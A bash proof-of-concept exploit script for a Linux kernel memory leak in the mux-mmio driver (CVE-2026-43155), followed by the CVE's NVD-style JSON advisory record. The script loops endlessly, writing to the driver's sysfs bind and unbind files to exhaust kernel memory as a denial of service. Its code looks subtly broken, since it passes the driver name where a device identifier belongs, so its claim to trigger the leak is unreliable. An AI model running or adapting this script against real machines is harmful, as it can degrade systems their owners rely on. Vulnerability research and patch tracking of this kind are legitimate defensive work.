CVE-2026-43155

#!/bin/bash # PoC script to trigger memory leak in mux:mmio driver # This script attempts to repeatedly bind and unbind the driver # to simulate probe failures and exhaustion of kernel memory. DRIVER_NAME="mux-mmio" SYSFS_PATH="/sys/bus/platform/drivers/$DRIVER_NAME" # Check if driver exists if [ ! -d "$SYSFS_PATH" ]; then echo "[!] Driver $DRIVER_NAME not found in $SYSFS_PATH" echo "[!] This PoC requires the vulnerable driver to be loaded." exit 1 fi echo "[*] Starting PoC for CVE-2026-43155..." echo "[*] Attempting to trigger memory leak via bind/unbind cycles..." COUNT=0 while true; do # Try to unbind (may fail if not bound, ignore error) echo "$DRIVER_NAME" > "$SYSFS_PATH/unbind" 2>/dev/null # Try to bind (this triggers the probe function) # If probe fails due to missing hardware or config, memory may leak echo "$DRIVER_NAME" > "$SYSFS_PATH/bind" 2>/dev/null ((COUNT++)) if [ $((COUNT % 100)) -eq 0 ]; then echo "[*] Cycles completed: $COUNT" # Monitor slab info for kmalloc-XX increases (optional) fi done

{"cve": {"id": "CVE-2026-43155", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:33.310", "lastModified": "2026-05-13T21:09:24.813", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmux: mmio: fix regmap leak on probe failure\n\nThe mmio regmap that may be allocated during probe is never freed.\n\nSwitch to using the device managed allocator so that the regmap is\nreleased on probe failures (e.g. probe deferral) and on driver unbind."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.16", "versionEndExcluding": "6.18.16", "matchCriteriaId": "B4562EDA-AFEA-4C62-97CC-C83E109A5F19"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/3c4ae63073d84abee5d81ce46d86a94e9dae9c89", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/76096f156fe9dc9fbd6e4618088706e91b9b0a6c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cbde3c109d52564ae2c12e514c33c44345e84b2c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}